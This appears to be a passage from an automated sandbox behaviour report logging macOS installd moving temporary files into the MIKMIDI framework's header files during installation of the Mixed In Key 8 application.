              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_HkUqfo -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_TAm0X4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIProgramChangeCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_pUG4F8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommand_SubclassMethods.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_w5kezn -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappingItem.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_VmDRRr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaLyricEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_kQw05w -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaInstrumentNameEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_6pw77U -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIInputPort.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_J1arIk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISystemKeepAliveCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_tlbYiQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ME6s64 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISequencer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_42Cryz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPolyphonicKeyPressureCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_BCvDfc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaSequenceEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_rZwg5e -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMapping.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_bplGE4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_GM0BKr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelPressureCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_keibOi -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommandThrottler.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_PZFTiV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISystemExclusiveCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_UtxeO6 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaCopyrightEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_OOM5aM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDITempoEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_B4slGq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPitchBendChangeEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_BRkIMn -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommandScheduler.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_1dXsoL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIControlChangeEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_X8EHkm -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEntity.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_IfJUut -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISynthesizerInstrument.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_YG9Vy6 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIObject.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ETSWYS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISynthesizer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ppqxHw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISequence.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_5XSmMd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetronome.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_j2LzS0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPitchBendChangeCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_tEYZU7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaEvent_SubclassMethods.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_cd1jxC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIControlChangeCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_dIA0Py -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIDestinationEndpoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_hIXQZ5 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDITransmittable.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_oexA3D -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelPressureEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_FNFYyD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIConnectionManager.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_7gnC9B -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_w073Y2 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIClock.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_hsRttS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIOutputPort.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_CazMpF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaCuePointEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_PRqdX1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_WqH7JK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_6nTdHL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaTrackSequenceNameEvent.hJump to behavior
